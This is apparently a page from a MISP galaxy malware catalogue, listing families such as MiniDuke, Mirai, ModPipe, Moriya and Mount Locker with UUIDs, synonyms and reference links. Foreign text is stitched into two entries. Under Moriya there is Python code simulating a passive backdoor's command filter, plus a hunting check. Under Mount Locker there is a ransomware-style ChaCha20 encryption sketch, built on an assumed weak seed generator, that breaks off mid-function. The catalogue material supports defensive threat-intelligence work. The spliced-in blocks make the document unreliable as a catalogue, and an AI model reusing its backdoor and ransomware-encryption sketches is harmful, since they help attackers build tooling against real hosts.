which can be used as unique global reference for MINIBUS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MiniDuke
The MiniDuke toolset consists of multiple downloader and backdoor components.
Internal MISP references
UUID 3d164ab8-58a5-433c-bbc9-b81a869ac8c8
which can be used as unique global reference for MiniDuke
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.miniduke - webarchive
- https://research.checkpoint.com/2022/native-function-and-assembly-code-invocation/ - webarchive
- https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
- https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/ - webarchive
- https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html - webarchive
- https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/ - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hemlock - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MiniStealer
Internal MISP references
UUID 01e605b0-aadc-40a3-986f-f0795fd20401
which can be used as unique global reference for MiniStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
miniTypeFrame
miniTYPEFRAME is a variant of TYPEFRAME, a RAT for Windows.
Its functionality is reduced to serve mostly as a proxy module. Its commands are indexed by 16-bit integers, usually in the range 0x8027–0x8044.
Internal MISP references
UUID fbf135fa-1194-4532-846a-eb1716e0b426
which can be used as unique global reference for miniTypeFrame
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MintStealer
Internal MISP references
UUID 15c036d3-e1d8-4e4a-850c-20ce65bdd24c
which can be used as unique global reference for MintStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mirage
Internal MISP references
UUID 6f6da371-2d62-4245-9aa3-8570e39222ae
which can be used as unique global reference for Mirage
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-palace - webarchive
- https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf - webarchive
- https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MirageFox
Internal MISP references
UUID b3e89b03-c5af-41cd-88b8-e15335abbb30
which can be used as unique global reference for MirageFox
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mirai (Windows)
Internal MISP references
UUID 2edd3051-b1b5-47f2-9155-8c97f791dfb7
which can be used as unique global reference for Mirai (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai - webarchive
- https://assets.virustotal.com/reports/2021trends.pdf - webarchive
- https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/ - webarchive
- https://twitter.com/PhysicalDrive0/status/830070569202749440 - webarchive
- https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/ - webarchive
- https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf - webarchive
- https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html - webarchive
- https://dev.azure.com/Mastadamus/Mirai%20Botnet%20Analysis/_wiki/wikis/Mirai-Botnet-Analysis.wiki/12/Anatomy-of-An-Mirai-Botnet-Attack - webarchive
- https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot/ - webarchive
- https://unit42.paloaltonetworks.com/moobot-d-link-devices/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MirrorBlast
According to Minerva Labs, MirrorBlast malware is a trojan that is known for attacking users' browsers. It usually pretends to be a legitimate browser add-on, but it has since evolved additional capabilities whereby other malware is installed at the same time. The trojan has tentatively been linked to the TA505 and PYSA groups.
Internal MISP references
UUID be347289-5ca5-4b49-b5ef-8443883736c1
which can be used as unique global reference for MirrorBlast
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast - webarchive
- https://threatresearch.ext.hp.com/mirrorblast-and-ta505-examining-similarities-in-tactics-techniques-and-procedures/ - webarchive
- https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies - webarchive
- https://www.proofpoint.com/us/daily-ruleset-update-summary-20210924 - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant - webarchive
- https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MirrorKey
According to Trend Micro, this is a loader for win.transbox, used by threat actor Earth Yako.
Internal MISP references
UUID 7340174e-3ff7-4293-acd0-1a82433a7777
which can be used as unique global reference for MirrorKey
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Misdat
Internal MISP references
UUID d1597713-fe7a-45bd-8b59-1a13c7e097d8
which can be used as unique global reference for Misdat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Misfox
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Misfox.
Known Synonyms |
---|
Dromedan |
MixFox |
ModPack |
Internal MISP references
UUID b4c33277-ec15-4bb3-89ef-314ecfa100da
which can be used as unique global reference for Misfox
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Misha
Undocumented information stealer targeting multiple browsers and cryptocurrency wallets. Its internal project name appears to be "misha".
Internal MISP references
UUID 3f32d0bf-61b9-495b-88ca-77f4a254336d
which can be used as unique global reference for Misha
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mispadu
According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald’s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mispadu.
Known Synonyms |
---|
URSA |
Internal MISP references
UUID ffc9ffcc-24f4-4e60-ab02-a75b007359fa
which can be used as unique global reference for Mispadu
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu - webarchive
- https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/ - webarchive
- https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/ - webarchive
- https://blog.scilabs.mx/cyber-threat-profile-malteiro/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces - webarchive
- https://seguranca-informatica.pt/ursa-trojan-is-back-with-a-new-dance/#.YyXEkaRBzIU - webarchive
- https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/ - webarchive
- https://perception-point.io/blog/manipulated-caiman-the-sophisticated-snare-of-mexicos-banking-predators-technical-edition/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MISTCLOAK
Mandiant associates this malware with UNC4191; it decrypts and runs DARKDEW.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MISTCLOAK.
Known Synonyms |
---|
HIUPAN |
Internal MISP references
UUID 1e6bc052-73de-453d-ba6c-658c82fe21d4
which can be used as unique global reference for MISTCLOAK
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MISTYVEAL
Internal MISP references
UUID d594d6c1-6d10-4fe8-acda-397df91c73ba
which can be used as unique global reference for MISTYVEAL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Miuref
Internal MISP references
UUID 4c786624-4a55-46e6-849d-b65552034235
which can be used as unique global reference for Miuref
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MMON
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MMON.
Known Synonyms |
---|
Kaptoxa |
Internal MISP references
UUID a6d12f4f-57f6-4873-9c68-e079fef5e5fb
which can be used as unique global reference for MMON
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MM Core
Internal MISP references
UUID 6363cc2f-08f1-47a0-adbf-5cf19ea89ffd
which can be used as unique global reference for MM Core
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MobiRAT
Internal MISP references
UUID e33aa1f8-a631-4274-afe0-f2fd3426332e
which can be used as unique global reference for MobiRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mocky LNK
LNK files used to lure and orchestrate execution of various scripts, interacting with the Mocky API service.
Internal MISP references
UUID 0eb52072-a2db-4689-bc2d-ac0ae65bdd8c
which can be used as unique global reference for Mocky LNK
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mocky_lnk - webarchive
- https://www.zscaler.com/blogs/security-research/steal-it-campaign - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf - webarchive
- https://cert.gov.ua/article/4492467 - webarchive
- https://www.trendmicro.com/en_us/research/24/a/pawn-storm-uses-brute-force-and-stealth.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mocton
Internal MISP references
UUID 7132c1de-9a3f-4f08-955f-ab6f7a09e17d
which can be used as unique global reference for Mocton
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ModernLoader
According to PCrisk, ModernLoader, also known as Avatar Bot and AvatarLoader, is a malicious program that has minimalistic loader and RAT (Remote Access Trojan) functionalities.
Loader-type malware is designed to infect devices with additional malicious programs, while RATs enable remote access/control over infected machines. ModernLoader is capable of executing basic commands and injecting malicious modules into systems.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ModernLoader.
Known Synonyms |
---|
AvatarBot |
Internal MISP references
UUID a3932600-e1fd-4fbe-b651-8da31109ee15
which can be used as unique global reference for ModernLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MoDi RAT
Internal MISP references
UUID 1f36d78b-6f3d-469e-8a60-5ecaebe9d80a
which can be used as unique global reference for MoDi RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ModPipe
ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS – a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture consisting of basic components and downloadable modules. One of them – named GetMicInfo – contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe's operators access to database contents, including various definitions and configuration, status tables and information about POS transactions.
Internal MISP references
UUID a4b3d07a-b3ce-4128-9c5c-caa218518a00
which can be used as unique global reference for ModPipe
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe - webarchive
- https://www.foregenix.com/blog/modpipe-malware-has-a-new-module-that-siphons-payment-card-data - webarchive
- https://www.kroll.com/en/insights/publications/cyber/modpipe-pos-malware-new-hooking-targets-extract-card-data - webarchive
- https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ModPOS
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ModPOS.
Known Synonyms |
---|
straxbot |
Internal MISP references
UUID 026d638b-cc51-4eff-97fc-d61215a1a70a
which can be used as unique global reference for ModPOS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mofksys
Internal MISP references
UUID 818a9036-a74f-4017-af07-cba9a471b316
which can be used as unique global reference for Mofksys
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Moisha Ransomware
Internal MISP references
UUID 16c5d8f9-c2f1-4599-bc93-bc02497deff8
which can be used as unique global reference for Moisha Ransomware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Moker
Internal MISP references
UUID 90a1a61e-3e69-4b92-ac11-9095ac2d9cf4
which can be used as unique global reference for Moker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.moker - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/ - webarchive
- https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/ - webarchive
- http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network - webarchive
- https://breakingmalware.com/malware/moker-part-2-capabilities/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mokes (Windows)
Internal MISP references
UUID 3a711d44-2a70-418d-92c1-692c3d3b13c2
which can be used as unique global reference for Mokes (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes - webarchive
- https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/ - webarchive
- https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mole
Internal MISP references
UUID aaeaf9ee-2f3d-4141-9d45-ec383ba8445f
which can be used as unique global reference for Mole
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MoleNet
MoleNet is a .NET downloader malware used by the Molerats group in targeted attacks in the Middle East. Before downloading additional payloads, it first collects information about the infected machine using WMI queries and sends the data to its operators. It was first discovered in 2020, however, Cybereason researchers showed that it has been in use since at least 2019, with infrastructure that operated since 2017.
Internal MISP references
UUID 76842aa1-f06d-49cf-90df-158346525f91
which can be used as unique global reference for MoleNet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Molerat Loader
Internal MISP references
UUID b50408c3-6676-4d3f-8a97-9114c215b67a
which can be used as unique global reference for Molerat Loader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader - webarchive
- https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf - webarchive
- https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east - webarchive
- https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/ - webarchive
- http://www.clearskysec.com/iec/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Monero Miner
According to ESET, first seen in-the-wild on 26th May, 2017, the malicious mining software is a fork of a legitimate open source Monero CPU miner called xmrig.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Monero Miner.
Known Synonyms |
---|
CoinMiner |
Internal MISP references
UUID c57a4168-cd09-4611-a665-bbcede80f42b
which can be used as unique global reference for Monero Miner
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner - webarchive
- https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor - webarchive
- https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/ - webarchive
- https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/ - webarchive
- https://asec.ahnlab.com/en/37526/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Money Message
A ransomware operation hitting companies worldwide, first spotted by Zscaler.
Internal MISP references
UUID 07dff193-2fad-4de6-83ad-046c6b95be46
which can be used as unique global reference for Money Message
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.moneymessage - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://yoroi.company/research/money-ransomware-the-latest-double-extortion-group/ - webarchive
- https://resources.securityscorecard.com/research/analysis-money-message-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
mongall
Internal MISP references
UUID e0627961-fc28-4b7d-bb44-f937defa052a
which can be used as unique global reference for mongall
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MontysThree
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MontysThree.
Known Synonyms |
---|
MT3 |
Internal MISP references
UUID 8a6013a1-5e5c-41f5-bd8e-c86ea7f108d9
which can be used as unique global reference for MontysThree
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MoonBounce
MoonBounce is a malware embedded into a modified UEFI firmware. Placed into SPI flash, it can provide persistence across full reinstall and even disk replacements. MoonBounce deploys user-mode malware through in-memory staging with a small footprint.
Internal MISP references
UUID 04ce84dc-f471-48b6-8456-348cd85af39f
which can be used as unique global reference for MoonBounce
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce - webarchive
- https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/ - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/19115831/MoonBounce_technical-details_eng.pdf - webarchive
- https://habr.com/ru/amp/post/668154/ - webarchive
- https://www.binarly.io/posts/A_deeper_UEFI_dive_into_MoonBounce/index.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MoonPeak
According to Cisco Talos, this RAT is derived from the open source XenoRAT.
Internal MISP references
UUID 47d27d87-0d5c-4761-a2a2-43982abb4d45
which can be used as unique global reference for MoonPeak
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MOONTAG
The malware, potentially named "MOON_TAG" by its developer as indicated by the strings within, is derived from code shared in a Google Group (https://groups.google.com/g/ph4nt0m/c/2J3_1XPeKD8/m/AYPoWudRcTAJ?pli=1). Each variant discovered possesses capabilities to communicate via the Microsoft Graph API. At this moment, it appears to be in development.
Internal MISP references
UUID 391c5173-8ca3-4f1b-8b34-a1eb0b21ea15
which can be used as unique global reference for MOONTAG
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MoonWalk
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MoonWalk.
Known Synonyms |
---|
CurveLast |
SneakCross |
Internal MISP references
UUID 6a0ce908-d535-4973-bc49-33b9869de99b
which can be used as unique global reference for MoonWalk
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MoonWind
Internal MISP references
UUID 8465177f-16c8-47fc-a4c8-f4c0409fe460
which can be used as unique global reference for MoonWind
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MoriAgent
Internal MISP references
UUID 3de9ccf5-4756-4c5b-9086-6664f5a9b761
which can be used as unique global reference for MoriAgent
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611 - webarchive
- https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/ - webarchive
- https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590# - webarchive
- https://twitter.com/Timele9527/status/1272776776335233024 - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-055a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Moriya
This tool is a passive backdoor which allows attackers to inspect all incoming traffic to the infected machine, filter out packets that are marked as designated for the malware and respond to them. This forms a covert channel over which attackers are able to issue shell commands and receive back their outputs.
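The covert channel described above, and the hunting check it invites, as an added example that is not Moriya's code and not from the page's sources. Moriya does its filtering in a kernel driver; this user-mode sketch keeps only the logic: a filter that claims marked inbound packets and leaves everything else to the OS, and a hunter-side check that flags a host answering with application data on a port where its socket table shows no listener. The 3-byte marker, the packet record layout and all traffic are constructed assumptions.

```python
"""Passive backdoor covert channel in the style of Moriya, with a hunting
check for it. Added illustration, not Moriya's code: Moriya filters inbound
packets in the kernel and answers only those marked for it; the 3-byte marker,
the record layout and all traffic below are constructed assumptions.
"""

MAGIC = b"MOR"  # ASSUMED marker; the real marker is not given on this page


def backdoor_filter(payload):
    """Backdoor side: claim only marked packets, leave all other traffic to the
    OS untouched. Returns (handled, reply_payload)."""
    if not payload.startswith(MAGIC):
        return False, None
    cmd = payload[len(MAGIC):]
    # Stand-in for running the command in a shell and capturing its output.
    return True, MAGIC + b"output-of:" + cmd


def simulate_capture(traffic, host):
    """Run inbound packets for `host` through the backdoor and append the
    replies it would emit, giving the capture a network sensor would see."""
    capture = list(traffic)
    for p in traffic:
        if p["dst"] != host:
            continue
        handled, reply = backdoor_filter(p["payload"])
        if handled:
            capture.append({"src": host, "sport": p["dport"],
                            "dst": p["src"], "dport": p["sport"],
                            "payload": reply})
    return capture


def hunt_closed_port_replies(capture, host, listening_ports):
    """Hunter side: the host's socket table has no listener on the port, yet
    the host sends application data back on exactly that flow. The OS alone
    would answer a closed port with RST/ICMP, never with a payload."""
    inbound = set()
    for p in capture:
        if p["dst"] == host and p["dport"] not in listening_ports and p["payload"]:
            inbound.add((p["src"], p["sport"], p["dport"]))
    hits = []
    for p in capture:
        if p["src"] == host and p["payload"]:
            if (p["dst"], p["dport"], p["sport"]) in inbound:
                hits.append(p)
    return hits


HOST = "10.0.0.20"
LISTENING = {22, 80}  # assumed socket-table snapshot of the monitored host
# Constructed sample traffic: a legitimate HTTP exchange, an unanswered
# probe, and a marked command packet for the backdoor on a closed port.
TRAFFIC = [
    {"src": "10.0.0.5", "sport": 51000, "dst": HOST, "dport": 80,
     "payload": b"GET / HTTP/1.1\r\nHost: intranet\r\n\r\n"},
    {"src": HOST, "sport": 80, "dst": "10.0.0.5", "dport": 51000,
     "payload": b"HTTP/1.1 200 OK\r\n\r\n"},
    {"src": "10.0.0.9", "sport": 44444, "dst": HOST, "dport": 8443,
     "payload": b"\x16\x03\x01"},
    {"src": "203.0.113.7", "sport": 40000, "dst": HOST, "dport": 8443,
     "payload": MAGIC + b"whoami"},
]


def demo():
    """Returns the flagged reply packets for the constructed capture."""
    capture = simulate_capture(TRAFFIC, HOST)
    return hunt_closed_port_replies(capture, HOST, LISTENING)
```

The check needs two data sources a hunter usually has anyway: a packet or flow capture and a per-host socket-table snapshot (netstat or equivalent) taken around the same time. Because the backdoor sits below the socket layer, host-based listener inventories look clean; the mismatch between "no listener" and "payload reply" is the observable.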
Internal MISP references
UUID 4dd511a6-be5f-40ae-9a9f-aaf354f7ea2e
which can be used as unique global reference for Moriya
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Morphine
Internal MISP references
UUID 9de41613-7762-4a88-8e9a-4e621a127f32
which can be used as unique global reference for Morphine
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MortalKombat
Internal MISP references
UUID ff3b11e4-3450-4db5-a2ed-5c45cd875330
which can be used as unique global reference for MortalKombat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mortis
Internal MISP references
UUID 354212b6-86df-4dcc-87b4-97f6e78b6a41
which can be used as unique global reference for Mortis
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Morto
Internal MISP references
UUID c931dc7d-9373-4545-911c-ad5589670c40
which can be used as unique global reference for Morto
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.morto - webarchive
- https://www.f-secure.com/weblog/archives/00002227.html - webarchive
- https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A - webarchive
- http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MosaicRegressor
Internal MISP references
UUID 45e780f0-aa06-4427-8393-ef1d358e354f
which can be used as unique global reference for MosaicRegressor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Moserpass
Internal MISP references
UUID 0dc319a2-96b5-420d-85ec-07f34f457402
which can be used as unique global reference for Moserpass
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mosquito
Internal MISP references
UUID 663df641-d396-4e93-93bd-bb9609ceb0ba
which can be used as unique global reference for Mosquito
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito - webarchive
- https://securelist.com/shedding-skin-turlas-fresh-faces/88069/ - webarchive
- https://www.recordedfuture.com/turla-apt-infrastructure/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf - webarchive
- https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/ - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hunter - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html - webarchive
- https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mount Locker
According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS) active since July 2020. The MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software. Victims' files are encrypted using ChaCha20, and the file encryption keys are encrypted using RSA-2048. The ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.
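The scheme above (a ChaCha20 key per file, wrapped with RSA-2048) and why weak key generation undermines it, as an added example that is not MountLocker's code and not from BlackBerry's analysis. The page does not say which generator MountLocker uses; the generator below (the Microsoft CRT rand() LCG seeded from a 32-bit tick count), the tick value, the zero nonce and the PDF file magic are assumptions chosen to make the attack concrete. RSA wrapping is omitted on purpose: when the seed space is 2^32, the attacker never needs the private key.

```python
"""Hybrid file encryption in the style described for MountLocker (ChaCha20
per-file key) and why a weak key generator undermines it.

Added illustration, not MountLocker's code. The weak generator below (the
Microsoft CRT rand() LCG seeded from a 32-bit tick count) is an ASSUMPTION;
the page does not say which generator MountLocker uses. RSA-2048 wrapping of
the file key is omitted: an attacker never needs the private key if the seed
space is small enough to enumerate.
"""
import struct

MASK = 0xFFFFFFFF


def _rotl(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK


def _quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & MASK
    s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK
    s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK
    s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK
    s[b] = _rotl(s[b] ^ s[c], 7)


def chacha20_block(key, counter, nonce):
    """RFC 8439 ChaCha20 block function: 64 bytes of keystream."""
    state = [0x61707865, 0x3320646E, 0x79622D32, 0x6B206574]
    state += list(struct.unpack("<8I", key))
    state += [counter & MASK] + list(struct.unpack("<3I", nonce))
    work = state[:]
    for _ in range(10):
        _quarter_round(work, 0, 4, 8, 12)
        _quarter_round(work, 1, 5, 9, 13)
        _quarter_round(work, 2, 6, 10, 14)
        _quarter_round(work, 3, 7, 11, 15)
        _quarter_round(work, 0, 5, 10, 15)
        _quarter_round(work, 1, 6, 11, 12)
        _quarter_round(work, 2, 7, 8, 13)
        _quarter_round(work, 3, 4, 9, 14)
    return struct.pack("<16I", *[(w + s) & MASK for w, s in zip(work, state)])


def chacha20_xor(key, nonce, data, counter=1):
    """Encrypt or decrypt (XOR with keystream)."""
    out = bytearray()
    for i in range(0, len(data), 64):
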